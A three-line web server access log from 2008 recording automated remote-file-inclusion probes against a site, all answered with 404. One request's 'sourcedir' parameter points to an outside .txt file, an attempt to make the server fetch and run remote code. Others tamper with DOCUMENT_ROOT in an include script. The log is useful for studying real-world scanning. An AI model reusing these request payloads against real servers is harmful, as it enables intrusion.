218.38.34.152 - - [26/Oct/2008:18:54:56 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
218.38.34.152 - - [26/Oct/2008:18:54:57 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:18:55:00 -0700] "GET /logs/access_080804.log/?sourcedir=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
